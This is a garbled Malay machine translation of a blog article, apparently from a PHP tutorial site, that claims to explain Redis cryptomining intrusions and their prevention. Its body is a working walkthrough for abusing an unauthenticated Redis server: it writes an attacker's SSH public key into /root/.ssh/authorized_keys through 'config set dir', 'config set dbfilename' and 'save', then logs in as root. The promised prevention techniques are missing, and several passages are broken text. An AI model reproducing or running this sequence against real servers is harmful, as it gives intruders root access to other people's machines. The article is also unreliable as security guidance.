Rumah > Artikel > pangkalan data > Analisis ringkas tentang prinsip perlombongan Redis dan cara mencegahnya (perkongsian kemahiran)
Artikel ini akan bercakap tentang prinsip perlombongan Redis, lihat cara mencegahnya, dan berkongsi teknik pencegahan saya harap ia akan membantu semua orang!
Penulis juga telah diserang oleh virus perlombongan, yang sangat tidak selesa, tetapi sebenarnya, selagi anda memahami cara pencerobohan, ia sangat mudah untuk mencegahnya. Hari ini kami akan menunjukkan cara untuk lulus Redis melakukan peningkatan keistimewaan untuk mendapatkan pengguna Root pelayan jauh. [Cadangan berkaitan: Tutorial video Redis]
1 Mula-mula kami memerlukan beberapa prasyarat
Syarat 1: Anda Didahulukan. mesti ada Redis, dan kita perlu tahu portnya [lalai 6379];
Syarat 2: Kata laluan Redis tidak boleh terlalu rumit, atau tiada kata laluan; >
2 🎜>
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsaKandungan adalah seperti berikut
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txtTujuan menambah dua baris baharu sebelum dan selepas di sini adalah untuk menghalang sambungan data Bersama-sama mereka menyebabkan masalah kegagalan.
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OK
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exitOK, kami telah berjaya meningkatkan keistimewaan di sini, jadi mari kita lihat apakah fail yang dieksport? Sebenarnya, ia hanyalah bentuk fail Redis yang disimpan Jika anda berminat, anda boleh membukanya sendiri dan melihatnya tidak akan ditunjukkan di sini.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~# w3. Bagaimana untuk mencegah
Kerentanan ini cukup kuat sekarang, tambahkannya pada tugas yang dijadualkan untuk melaksanakan beberapa skrip dan kemudian Apa mengenai jangkitan kumpulan?
Teknik pencegahan adalah seperti berikut:
Atas ialah kandungan terperinci Analisis ringkas tentang prinsip perlombongan Redis dan cara mencegahnya (perkongsian kemahiran). Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!